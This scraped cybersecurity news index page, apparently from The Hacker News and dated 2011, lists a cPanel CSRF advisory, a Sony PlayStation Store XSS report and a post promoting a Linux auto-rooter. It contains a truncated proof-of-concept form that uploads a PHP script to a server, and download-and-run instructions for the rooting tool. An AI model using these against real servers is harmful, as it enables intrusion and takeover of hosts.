-->
#1 Trusted Cybersecurity News Platform
Followed by 5.20+ million
The Hacker News Logo
Subscribe – Get Latest News
Security Service Edge

The Hacker News | #1 Trusted Source for Cybersecurity News — Index Page

Security Alert : cPanel 11.25 CSRF vulnerability to upload any php Script !

Security Alert : cPanel 11.25 CSRF vulnerability to upload any php Script !

May 28, 2011
Security Alert : cPanel 11.25 CSRF vulnerability to upload any php Script ! cPanel versions below and excluding 11.25 , are vulnerable to CSRF which leads to uploading a PHP script of the attackers liking. If you have turned off security tokens and referrer security check, no matter what version you are using, you are vulnerable as well. Proof Of Concept : <html> < form   name = "editform"   action=" http://localhost:2082/frontend/x3/err/savefile.html"  method = POST onSubmit = "return loadfdata();" > < input   type = "hidden"   id = "codepage"   class = "codepress html"   name = "page" value="<?php echo 'ninjashell'; ?>"> < input   type = "hidden"   name = "domain"   value = "localhost" > < input   type = "hidden"   value = "public_html/"   name = "dir" > < input   type = ...
XSS Vulnerability found on Sony PlayStation Store Website

XSS Vulnerability found on Sony PlayStation Store Website

May 28, 2011
XSS Vulnerability found on Sony PlayStation Store Website XSS Vulnerability found on Sony PlayStation Store Website at  https://store.playstation.com/ ,This  Vulnerability is posted by someone on a Forum site. The XSS is working on Firefox Browser, Not applicable for Crome Browser. Here in Screenshot you can see that, The backlink Code behind " Back " button has been modified using XSS attack.  Proof of Concept : 1.) Open Url in Firefox : Click Here 2.) Now Click on the Back Button shown at middle of the page. You will be Redirected to Google.com . This XSS Vulnerability can be misused By hackers for Phishing or any Cyber Crime Activity. We have Notice that, almost 70% Sony's websites are Vulnerable with various Flaws. Sony Should Fix it as soon as possible, Before any next hack attack. Thanks.
R00TW0RM Linux Auto rooter for 2010 kernel Coded by CrosS

R00TW0RM Linux Auto rooter for 2010 kernel Coded by CrosS

May 28, 2011
R00TW0RM Linux Auto rooter for 2010 kernel Coded by CrosS Roots linux server Automatically if the Kernel version is still vulnerable to exploit. Previously a 2009 Auto rooter was Released and now 2010 is being released. for more updated like 2011 and other Exploits and Methods stay in touch with http://r00tw0rm.com/forum | R00TW0RM - Private Community Download :  http://r00tw0rm.com/CrosS- 2010.txt Usage : Just upload/fetch/wget and give sommand => perl CrosS-2010.txt Also see :  R00TW0RM Linux Auto rooter for 2009 kernel Coded by CrosS
cyber security

Eliminate Shadow AI Blind Spots

websiteNudge SecuritySaaS Security / Shadow AI
Shadow AI is quietly accessing sensitive data across your SaaS environment. Learn how to close AI blind spots and get ahead of data exposure risks.
cyber security

OpenClaw: RCE, Leaked Tokens, and 21K Exposed Instances in 2 Weeks

websiteReco AIAttack Surface / AI Agents
The viral AI agent connects to Slack, Gmail, and Drive—and most security teams have zero visibility into it.
Popular Resources
Articles
100+ Domains Multiply Attack Risk 6× - Download the CTEM Divide Research
Articles
Boost SOC Efficiency with AI-Guided Triage — Download Investigator Overview
Articles
Silent Residency Is the New Threat Model — Download the Red Report
Articles
Exposed Cloud Training Apps Are Letting Hackers In — Download the Research
Expert Insights Articles Videos
Cybersecurity Resources